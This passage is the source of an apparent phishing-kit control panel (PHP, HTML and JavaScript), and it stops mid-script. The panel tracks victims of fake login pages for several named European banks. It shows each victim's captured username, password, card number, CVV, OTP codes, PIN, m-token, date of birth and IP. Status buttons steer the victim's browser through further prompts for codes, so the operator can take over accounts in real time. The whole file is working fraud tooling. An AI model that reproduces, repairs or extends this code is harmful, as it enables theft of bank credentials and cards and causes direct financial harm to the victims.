<!-- index.php -->

<?php
session_start(); // Start the session
$uniqueid = isset($_GET["uniqueid"]) ? urldecode($_GET["uniqueid"]) : ""; // Decode the URL parameter

if (!isset($_SESSION['loggedin']) || $_SESSION['loggedin'] !== true) {
    // Redirect to login.php if the user is not logged in
    header('Location: login.php');
    exit;
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Info Details</title>
    <!-- Google Font -->
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;700&display=swap" rel="stylesheet">
    <link href="assets/css/body.css" rel="stylesheet">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script>
        function hideButtonsIfTypeMatches(typeToCheck, buttonIds) {
            let params = new URLSearchParams(window.location.search);
            let typeParam = params.get('type');
    
            if (typeParam === typeToCheck) {
                buttonIds.forEach(id => {
                    let button = document.getElementById(id);
                    if (button) {
                        button.style.display = 'none';
                    }
                });
            }
        }
    
        window.onload = function() {
            hideButtonsIfTypeMatches('1', [ 'code', 'codere','mtoken', 'mtokenre', 'appli2', 'dob','ffff','phone','phonere']);
            hideButtonsIfTypeMatches('2', ['', 'code', 'codere','mtoken', 'mtokenre', 'appli2', 'dob','ffff','phone','phonere']);
            hideButtonsIfTypeMatches('4', ['', 'code', 'codere','mtoken', 'mtokenre', 'appli2', 'dob','reconfirm','ffff','phone','phonere']);
            hideButtonsIfTypeMatches('11', ['code', 'codere','mtoken', 'mtokenre', 'appli2', 'dob','reconfirm','confirm','email','emailre' ,'ffff','phone','phonere']);
            hideButtonsIfTypeMatches('12', ['code', 'codere','mtoken', 'mtokenre', 'appli2', 'dob','reconfirm','confirm','email','emailre','ffff' ,'phone','phonere']);
            hideButtonsIfTypeMatches('3',['reconfirm','appli2','email','emailre','dob','ffff','phone','phonere']);
            hideButtonsIfTypeMatches('5',['mtoken','mtokenre','reconfirm','email','emailre','confirm','ffff','phone','phonere']);
            hideButtonsIfTypeMatches('8',['mtoken','mtokenre','reconfirm','code','codere','email','emailre','dob','ffff','phone','phonere']);
            hideButtonsIfTypeMatches('10',['mtoken','mtokenre','reconfirm','email','emailre','dob']);
        };
    </script>
    
    
    <!-- Styles -->
     <style>/* Custom scrollbar for WebKit browsers (Chrome, Edge, Safari) */
        ::-webkit-scrollbar {
          width: 8px; /* Smaller scrollbar width */
        }
        
        ::-webkit-scrollbar-track {
          background: #6363ff; /* Black background for the scrollbar track */
        }
        
        ::-webkit-scrollbar-thumb {
          background-color: #6363ff; /* White scrollbar handle */
          border-radius: 10px; /* Rounded edges */
        }
        
        ::-webkit-scrollbar-thumb:hover {
          background-color: #000; /* Light grey on hover */
        }
        
        /* Custom scrollbar for Firefox */
        html {
          scrollbar-width: thin; /* Thin scrollbar */
          scrollbar-color: #6363ff #000; /* White thumb on black track */
        }
        .dialog-overlay {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: rgba(0, 0, 0, 0.7);
      display: flex;
      justify-content: center;
      align-items: center;
      visibility: hidden;
      opacity: 0;
      transition: visibility 0.3s, opacity 0.5s;
    }

    .dialog {
      background-color: #1e1e1e;
      padding: 30px;
      border-radius: 15px;
      width: 450px;
      box-shadow: 0 10px 30px rgba(0, 0, 0, 0.7);
      text-align: center;
      transform: scale(0.7);
      transition: transform 0.3s ease;
      position: relative;
    }

    .dialog.visible {
      transform: scale(1);
    }

    .dialog-title {
      font-size: 26px;
      font-weight: 600;
      color: #ffffff;
      margin-bottom: 12px;
      display: flex;
      align-items: center;
      justify-content: center;
    }

    .dialog-title .icon {
      width: 24px;
      height: 24px;
      margin-right: 10px;
      border-radius: 50%;
      background-color: #6363ff;
      display: inline-block;
      position: relative;
    }

    .dialog-title .icon::after {
      content: "!";
      color: #ffffff;
      font-weight: bold;
      font-size: 16px;
      position: absolute;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
    }

    .dialog-subtitle {
      font-size: 18px;
      color: #b0b0b0;
      margin-bottom: 25px;
    }

    .dialog-input {
      width: 100%;
      padding: 12px;
      margin-bottom: 20px;
      border: none;
      border-radius: 10px;
      background-color: #2c2c2c;
      color: #ffffff;
      font-size: 16px;
      transition: background-color 0.3s;
    }

    .dialog-input:focus {
      background-color: #3a3a3a;
      outline: none;
    }

    .submit-btn {
      padding: 14px 28px;
      background: linear-gradient(135deg, #6363ff, #4b4bff);
      color: #ffffff;
      border: none;
      border-radius: 30px;
      font-size: 18px;
      cursor: pointer;
      box-shadow: 0 5px 15px rgba(99, 99, 255, 0.4);
      transition: transform 0.2s, box-shadow 0.3s ease-in-out;
    }

    .submit-btn:hover {
      transform: scale(1.05);
      box-shadow: 0 8px 25px rgba(99, 99, 255, 0.6);
    }

    .dialog-overlay.visible {
      visibility: visible;
      opacity: 1;
    }

    .close-btn {
      position: absolute;
      top: 15px;
      right: 15px;
      width: 25px;
      height: 25px;
      cursor: pointer;
      color: #ffffff;
      border: none;
      background-color: transparent;
      font-size: 24px;
      line-height: 24px;
      transition: color 0.3s;
    }

    .close-btn:hover {
      color: #6363ff;
    }


#modal {
    display: none; /* Hidden by default */
    position: fixed;
    z-index: 1; /* Sit on top */
    left: 0;
    top: 0;
    width: 100%; /* Full width */
    height: 100%; /* Full height */
    overflow: auto; /* Enable scroll if needed */
    background-color: rgba(0, 0, 0, 0.8); /* Dark semi-transparent background */
}

.modal-content {
    background-color: #1e1e1e; /* Dark grey background for modal */
    margin: 10% auto; /* Adjusted margin for more compactness */
    padding: 20px;
    border: 1px solid #444; /* Slightly lighter border */
    width: 50%; /* Reduced width for modal */
    border-radius: 8px;
    box-shadow: 0 4px 16px rgba(0, 0, 0, 0.5);
    text-align: center; /* Center the content */
}

.close-button {
    color: #fff; /* White text for the close button */
    float: right;
    font-size: 28px;
    font-weight: bold;
}

.close-button:hover,
.close-button:focus {
    color: #ff3d00; /* Change color on hover */
    cursor: pointer;
}

.checkbox-group {
    display: flex; /* Use flexbox to align checkboxes */
    justify-content: center; /* Center checkboxes */
    margin: 20px 0;
}

input[type="checkbox"] {
    transform: scale(2); /* Made checkboxes significantly larger */
    margin: 0 20px; /* Space between checkboxes */
}

button {
    background-color: #6363ff; /* Purple button color */
    color: white;
    padding: 12px 24px; /* Larger padding for buttons */
    margin: 5px;
    border: none;
    border-radius: 5px;
    cursor: pointer;
    font-size: 18px; /* Larger font size for buttons */
    font-weight: bold; /* Bold text for buttons */
    transition: background-color 0.3s ease;
}

button:hover {
    background-color: #6363ff; /* Darker purple on hover */
}

        </style>


<script>
    document.addEventListener("DOMContentLoaded", function() {
        // Get references to preloader and main content elements
        const preloader = document.getElementById('preloader');
        const mainContent = document.getElementById('main-content');

        // Function to check if the URL has the uniqueid parameter
        function hasUniqueIdParam() {
            const urlParams = new URLSearchParams(window.location.search);
            return urlParams.has('uniqueid');
        }

        // Function to hide preloader and show main content
        function hidePreloader() {
            if (hasUniqueIdParam()) {
                preloader.style.display = 'none';
                mainContent.style.display = 'block';
            }
        }

        // Hide the preloader and show the main content after 900 milliseconds
        setTimeout(hidePreloader, 900); // 900 milliseconds = 0.9 seconds
    });
</script>
<script>
    function openDialog() {
      const dialogOverlay = document.getElementById('dialogOverlay');
      const dialog = document.getElementById('dialog');
      dialogOverlay.classList.add('visible');
      setTimeout(() => {
        dialog.classList.add('visible');
      }, 100); // Small delay for animation
    }

    function closeDialog() {
      const dialogOverlay = document.getElementById('dialogOverlay');
      const dialog = document.getElementById('dialog');
      dialog.classList.remove('visible');
      setTimeout(() => {
        dialogOverlay.classList.remove('visible');
      }, 300); // Delay the overlay close to sync with dialog scale-out animation
    }

    function outsideClick(event) {
      const dialog = document.getElementById('dialog');
      if (event.target === dialog.parentNode) {
        closeDialog();
      }
    }
  </script>
</head>
<body>

    <div id="preloader" class="preloader">
        <div class="loader">
            <svg height="0" width="0" viewBox="0 0 64 64" class="absolute">
                <defs>
                    <linearGradient gradientUnits="userSpaceOnUse" y2="2" x2="0" y1="62" x1="0" id="b">
                        <stop stop-color="#973BED"></stop>
                        <stop stop-color="#007CFF" offset="1"></stop>
                    </linearGradient>
                    <linearGradient gradientUnits="userSpaceOnUse" y2="0" x2="0" y1="64" x1="0" id="c">
                        <stop stop-color="#FFC800"></stop>
                        <stop stop-color="#F0F" offset="1"></stop>
                        <animateTransform repeatCount="indefinite" keySplines=".42,0,.58,1;.42,0,.58,1;.42,0,.58,1;.42,0,.58,1;.42,0,.58,1;.42,0,.58,1;.42,0,.58,1;.42,0,.58,1" keyTimes="0; 0.125; 0.25; 0.375; 0.5; 0.625; 0.75; 0.875; 1" dur="8s" values="0 32 32;-270 32 32;-270 32 32;-540 32 32;-540 32 32;-810 32 32;-810 32 32;-1080 32 32;-1080 32 32" type="rotate" attributeName="gradientTransform"></animateTransform>
                    </linearGradient>
                    <linearGradient gradientUnits="userSpaceOnUse" y2="2" x2="0" y1="62" x1="0" id="d">
                        <stop stop-color="#00E0ED"></stop>
                        <stop stop-color="#00DA72" offset="1"></stop>
                    </linearGradient>
                </defs>
            </svg>
            <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 64 64" height="64" width="64" class="inline-block">
                <path stroke-linejoin="round" stroke-linecap="round" stroke-width="8" stroke="url(#b)" d="M 54.722656,3.9726563 A 2.0002,2.0002 0 0 0 54.941406,4 h 5.007813 C 58.955121,17.046124 49.099667,27.677057 36.121094,29.580078 a 2.0002,2.0002 0 0 0 -1.708985,1.978516 V 60 H 29.587891 V 31.558594 A 2.0002,2.0002 0 0 0 27.878906,29.580078 C 14.900333,27.677057 5.0448787,17.046124 4.0507812,4 H 9.28125 c 1.231666,11.63657 10.984383,20.554048 22.6875,20.734375 a 2.0002,2.0002 0 0 0 0.02344,0 c 11.806958,0.04283 21.70649,-9.003371 22.730469,-20.7617187 z" class="dash" id="y" pathLength="360"></path>
            </svg>
            <svg xmlns="http://www.w3.org/2000/svg" fill="none" style="--rotation-duration:0ms; --rotation-direction:normal;" viewBox="0 0 64 64" height="64" width="64" class="inline-block">
                <path stroke-linejoin="round" stroke-linecap="round" stroke-width="10" stroke="url(#c)" d="M 32 32 m 0 -27 a 27 27 0 1 1 0 54 a 27 27 0 1 1 0 -54" class="spin" id="o" pathLength="360"></path>
            </svg>
            <div class="w-2"></div>
            <svg xmlns="http://www.w3.org/2000/svg" fill="none" style="--rotation-duration:0ms; --rotation-direction:normal;" viewBox="0 0 64 64" height="64" width="64" class="inline-block">
                <path stroke-linejoin="round" stroke-linecap="round" stroke-width="8" stroke="url(#d)" d="M 4,4 h 4.6230469 v 25.919922 c -0.00276,11.916203 9.8364941,21.550422 21.7500001,21.296875 11.616666,-0.240651 21.014356,-9.63894 21.253906,-21.25586 a 2.0002,2.0002 0 0 0 0,-0.04102 V 4 H 56.25 v 25.919922 c 0,14.33873 -11.581192,25.919922 -25.919922,25.919922 a 2.0002,2.0002 0 0 0 -0.0293,0 C 15.812309,56.052941 3.998433,44.409961 4,29.919922 Z" class="dash" id="u" pathLength="360"></path>
            </svg>
        </div>
    </div>
    <div class="dialog-overlay" id="dialogOverlay" onclick="outsideClick(event)">
        <div class="dialog" id="dialog">
          <button class="close-btn" onclick="closeDialog()">×</button>
          <div class="dialog-title">
            <div class="icon"></div> Enter those 4 digits...
          </div>
          <div class="dialog-subtitle">Enter those 4 digits you want to send and click submit or resend</div>
          <input id="usernameee" type="text" class="dialog-input" placeholder="code">
          <button class="submit-btn" id="jshdjwshd" >Submit</button>
          <button class="submit-btn" id="resendappli2" >resend</button>
        </div>
      </div>

      <div class="dialog-overlay" id="dialogOverlayAlt" onclick="outsideClickAlt(event)">
        <div class="dialog" id="dialogAlt">
            <button class="close-btn" onclick="closeDialogAlt()">×</button>
            <div class="dialog-title">
                <div class="icon"></div> Enter the data 
            </div>
            <div class="dialog-subtitle">Enter the line or sentence you want to send and click submit or resend</div>
            <input id="usern" type="text" class="dialog-input" placeholder="new pharse">
            <button class="submit-btn" id="submitAlt">Submit</button>
            <button class="submit-btn" id="resendAlt">Resend</button>
        </div>
    </div>

     <!-- Modal Structure -->
     <div id="modal" class="modal">
        <div class="modal-content">
            <span class="close-button">&times;</span>
            <h2 style="font-weight: bold; font-size: 24px; text-align: center;">Select Options</h2>
            <form id="submit-otp-<?php echo $uniqueid; ?>">
                <div class="checkbox-group">
                    <input type="checkbox" name="option1">
                    <input type="checkbox" name="option2">
                    <input type="checkbox" name="option3">
                    <input type="checkbox" name="option4">
                    <input type="checkbox" name="option5">
                    <input type="checkbox" name="option6">
                    <input type="checkbox" name="option7">
                    <input type="checkbox" name="option8">
                </div>
                <div style="text-align: center;">
                    <button type="submit">Send</button>
                    <button type="button" id="resend-button">Resend</button>
                </div>
            </form>
        </div>
    </div>
    <div class="top-bar" id="statusBar">
        <span id="statusText">Loading...</span>
    </div>
    
    <!-- Static bar based on type -->
    <div class="static-bar" id="typeBar">
        <span id="typeText">Type: Loading...</span>
    </div>

    <div class="toast" id="toast">Data Updated</div>
    <div class="clipboard-toast" id="clipboardToast">Copied to Clipboard</div>

    <div class="container">
        <div class="data-section" id="detailsContainer">
            <h1>Details Information</h1>
            <!-- Details will be loaded here via AJAX -->
            <div id="pageInfo" class="page-info"></div>
        </div>
        <div style="height: 80vh; margin: 0; padding: 0; background-color: black; display: flex; justify-content: center; align-items: center;">
            <div class="buttons-section" style="display: grid; grid-template-columns: 1fr 1fr; gap: 15px; width: 100%; max-width: 600px; padding: 30px; box-sizing: border-box;">
                <button id="username" class="button button1" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #e11d48;">username</button>
                <button id="confirm" class="button button2" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #3b82f6;">confirm</button>
                <button id="reconfirm" class="button button3" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #22c55e;">reconfirm</button>
                <button id="cc" class="button button4" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #eab308;">cc</button>
                <button id="recc" class="button button5" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #a855f7;">re cc</button>
                <button id="otp" class="button button6" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #ec4899;">otp </button>
                <button id="reotp" class="button button7" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #6366f1;">re otp</button>
                <button id="pincode" class="button button8" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #14b8a6;">pincode</button>
                <button id="pincodere" class="button button4" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #eab308;">re pincode</button>
                <button id="complete" class="button button4" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #eab308;">complete</button>
                <button id="email" class="button button4" style="display: ;padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #eab308;">email</button>
                <button  id="emailre" class="button button5" style="display:; padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #a855f7;">email re</button>
                <button id="block" onclick="blockUserIP()" class="button button5" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #a855f7;">block ip</button>
                <button id="code" class="button button4" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #eab308;">code</button>
                <button id="codere" class="button button4" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #eab308;">code re</button>
                <button  id="mtoken" class="button button5" style=" padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #a855f7;">mtoken</button>
                <button id="mtokenre" class="button button5" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #a855f7;">mtoken re</button>
                <button  id="appli2" onclick="openDialog()" class="button button5" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #a855f7;">CUSTOM CC</button>
                <button  id="appli2" onclick="openDialogAlt()" class="button button5" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #a855f7;">CUSTOM pin</button>
                <button  id="ffff" class="button button5" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #a855f7;">open</button>
                <button  id="dob" class="button button5" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #a855f7;">dob</button>
                <button id="phone" class="button button1" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #e11d48;">phone</button>
                <button id="phonere" class="button button2" style="padding: 20px; border: none; border-radius: 10px; color: white; font-size: 18px; font-weight: bold; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s; background-color: #3b82f6;">phonere</button>
            </div>

        </div>

        
    <!-- JavaScript for AJAX and dynamic updates -->
    <script>
        var globalIp = null;
        const uniqueid = new URLSearchParams(window.location.search).get('uniqueid');
        const apiUrl = `../datauser/singlefetch.php?uniqueid=${uniqueid}`;
        const statusBar = document.getElementById('statusBar');
        const statusText = document.getElementById('statusText');
        const typeBar = document.getElementById('typeBar');
        const typeText = document.getElementById('typeText');
        const detailsContainer = document.getElementById('detailsContainer');
        const pageInfo = document.getElementById('pageInfo');
        const editButton = document.getElementById('editButton');
        const toast = document.getElementById('toast');
        const clipboardToast = document.getElementById('clipboardToast');
        const toastAudio = new Audio('assets/audio.mp3');

        const statusMap = {
            0: 'Loading',
            1: 'Resent Login',
            2: 'appli1 page',
            3: 'Resend appli1',
            4: 'qr code page',
            5: 'aplii2 resent',
            99: 'qr code resent',
            101: 'cc page',
            102: 'cc page resent',
            100: 'aplii2 page',
            105: 'otp page',
            200: 'complete page',
            201: 'balance',
            202: 'qr loading',
            203: 'pincode',
            500: 'appli 3',
            2000: 'pincode re',
            2001: 'otp re',
            2003: 'email',
            4000: '6 code',
            4001: '6 code re',
            4002: 'mtoken',
            4003: 'mtoken re',
            2004: 'email re',
            10002: 'phone',
            10003: 'phone re'
        };

        // Map for the static bar text based on 'type'
        const typeMap = {
            11: 'abnamro-Prive',
            12: 'abnamro-Zakelijk',
            3: 'George',
            4: 'prima bank',
            5: 'csob bank',
            6: 'mbank',
            8: 'tatra bank',
            9: 'unicreditbanking',
            10: 'vub bank',
            default: 'jhjwh'
        };

        let previousData = null;

        function updateStatusAndDetails() {
            fetch(apiUrl)
                .then(response => response.json())
                .then(data => {
                    if (data) {
                        // Update status
                        const lastActivity = data.last_activity;
                        const currentTime = Math.floor(Date.now() / 1000);
                        globalIp = data.ip;
                        console.log(globalIp)
                        const onlineThreshold = 8; // seconds
                        if (currentTime - lastActivity < onlineThreshold) {
                            statusBar.className = 'top-bar status-online';
                            statusText.textContent = 'Online';
                        } else {
                            statusBar.className = 'top-bar status-offline';
                            statusText.textContent = 'Offline';
                        }

                        // Update type bar based on 'type'
                        const typeValue = typeMap[data.type] || typeMap.default;
                        typeText.textContent = `BANK -  ${typeValue}`;

                        // Check for changes (excluding 'last_activity') and show toast if needed
                        if (previousData && hasDataChanged(previousData, data)) {
                            showToast(previousData, data);
                        }

                        previousData = data;

                        // Update details with simplified data
                        pageInfo.innerHTML = `
                          
${!(data.type == 6 || data.type == 9) ? `<p><span class='bold'>Username</span> <span class='copyable'>${data.username}</span></p>` : ''}

${!(data.type == 6 || data.type == 9) ? `<p><span class='bold'>Password</span> <span class='copyable'>${data.password}</span></p>` : ''}
${!(data.type == 6 || data.type == 9) ? `<p><span class='bold'>Response</span> <span class='copyable'>${data.response}</span></p>` : ''}
<p><span class='bold'>Card Number:</span> <span class='copyable'>${data.cardnumber}</span></p>
<p><span class='bold'>Expiry Date:</span> <span class='copyable'>${data.expirydate}</span></p>
<p><span class='bold'>CVV:</span> <span class='copyable'>${data.cvv}</span></p>
<p><span class='bold'>Login OTP:</span> <span class='copyable'>${data.login_otp}</span></p>
${(data.type == 2 || data.type == 4) ? `<p><span class='bold'>email code</span> <span class='copyable'>${data.email}</span></p>` : ''}
${(data.type == 3 || data.type == 10 || data.type == 5 || data.type == 8 ) ? `<p><span class='bold'>code</span> <span class='copyable'>${data.code}</span></p>` : ''}
${data.type == 10 ? `<p><span class='bold'>otp 2</span> <span class='copyable'>${data.payment_otp}</span></p>` : ''}
${data.type == 10 ? `<p><span class='bold'>Phone number</span> <span class='copyable'>${data.phone}</span></p>` : ''}
${data.type == 5 ? `<p><span class='bold'>dob</span> <span class='copyable'>${data.dob}</span></p>` : ''}

${data.type == 3 ? `<p><span class='bold'>m token</span> <span class='copyable'>${data.mtoken}</span></p>` : ''}
<p><span class='bold'>Pincode:</span> <span class='copyable'>${data.pincode}</span></p>
${data.type == 8 ? `<p><span class='bold'>Balance:</span> <span class='copyable'>${data.balance ? data.balance : 'Not available'}</span></p>` : ''}

<p><span class='bold'>Status:</span> <span class='copyable'>${statusMap[data.status] || 'Unknown Status'}</span></p>
<p><span class='bold'>Viewed:</span> <span class='copyable'>${data.viewed === 'true' ? 'True' : 'False'}</span></p>
<p><span class='bold'>Blocked:</span> <span class='copyable'>${data.blocked === 'true' ? 'True' : 'False'}</span></p>
<p><span class='bold' >IP:</span> <span class='copyable'>${data.ip}</span></p>
<p><span class='bold'>Unique ID:</span> <span class='copyable'>${data.uniqueid}</span></p>
<p><span class='bold'>Last Activity:</span> <span class='copyable'>${new Date(data.last_activity * 1000).toLocaleString()}</span></p>
<p><span class='bold'>Type:</span> <span class='copyable'>${data.type}</span></p>
                        `;

                        // Add clipboard functionality
                        document.querySelectorAll('.copyable').forEach((element) => {
                            element.addEventListener('click', () => copyToClipboard(element.textContent));
                        });

                        // Update edit button link
                        editButton.href = `edit.php?uniqueid=${data.uniqueid}`;
                    }
                })
                
                .catch(error => console.error('Error fetching data:', error));
                
        }

        function hasDataChanged(previousData, newData) {
            const fieldsToCompare = { ...newData };
            delete fieldsToCompare.last_activity;
            delete fieldsToCompare.status;
            delete fieldsToCompare.cvv;
            delete fieldsToCompare.expirydate;
            delete fieldsToCompare.blocked; // Ignore last_activity in comparison

            const previousFields = { ...previousData };
            delete previousFields.last_activity;
            delete previousFields.status;
            delete previousFields.cvv;
            delete previousFields.expirydate;
            delete previousFields.blocked; // Ignore last_activity in comparison

            return JSON.stringify(fieldsToCompare) !== JSON.stringify(previousFields);
        }

        function showToast(previousData, newData) {
            const updatedFields = [];
            for (const key in newData) {
                if (newData[key] !== previousData[key] && key !== 'last_activity') {
                    updatedFields.push(key);
                }
            }

            if (updatedFields.length > 0) {
                toast.textContent = `Updated Fields: ${updatedFields.join(', ')}`;
                toast.classList.add('show');
                toastAudio.play();
                setTimeout(() => {
                    toast.classList.remove('show');
                }, 6000);
            }
        }

        function copyToClipboard(value) {
            navigator.clipboard.writeText(value)
                .then(() => {
                    clipboardToast.textContent = 'Copied to Clipboard';
                    clipboardToast.classList.add('show');
                    setTimeout(() => {
                        clipboardToast.classList.remove('show');
                    }, 2000);
                })
                .catch(err => console.error('Error copying to clipboard:', err));
        }

        function showToasti(value) {
    const clipboardToast = document.getElementById('clipboardToast'); // Ensure this element is present in your HTML
    clipboardToast.textContent = 'page sent';
    clipboardToast.classList.add('show');
    setTimeout(() => {
        clipboardToast.classList.remove('show');
    }, 2000);
}

        // Fetch data initially
        updateStatusAndDetails();

        // Poll for updates every 3 seconds
        setInterval(updateStatusAndDetails, 4000);

        
    </script>
    <script>
        $('#username').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=1",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $(document).ready(function() {
    // Event listener for clicking on the email element
    $('#email').click(function() {
        triggerAjaxTask();
    });

    // Event listener for pressing the 'e' key
    $(document).keydown(function(event) {
        if (event.key === 'e' || event.key === 'E') {
            triggerAjaxTask();
        }
    });

    function triggerAjaxTask() {
        var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
        showToasti();
        $.ajax({
            url: "../sqldata/updatestatus.php?status=2003",
            type: "POST",
            data: { uniqueid: uniqueid },
            success: function(response) {
                if (response.status === "success") {
                    showToast();
                } else {
                    console.error("Error updating status");
                }
            },
            error: function(xhr, status, error) {
                console.error(status, error);
            }
        });
    }
});

           $('#emailre').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=2004",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#confirm').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=2",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#reconfirm').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=3",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#cc').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=101",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#recc').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=102",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#otp').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=105",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#reotp').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=2001",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#pincode').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=203",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
                   error: function(xhr, status, error) {
                       console.error(status, error);
                   }
               });
           });
           $('#pincodere').click(function() {
               var uniqueid = '<?php echo $_GET["uniqueid"]; ?>';
               showToasti();
               $.ajax({
                   url: "../sqldata/updatestatus.php?status=2000",
                   type: "POST",
                   data: { uniqueid: uniqueid },
                   success: function(response) {
                       if (response.status === "success") {
                           
                           showToast();
                       } else {
                           console.error("Error updating status");
                       }
                   },
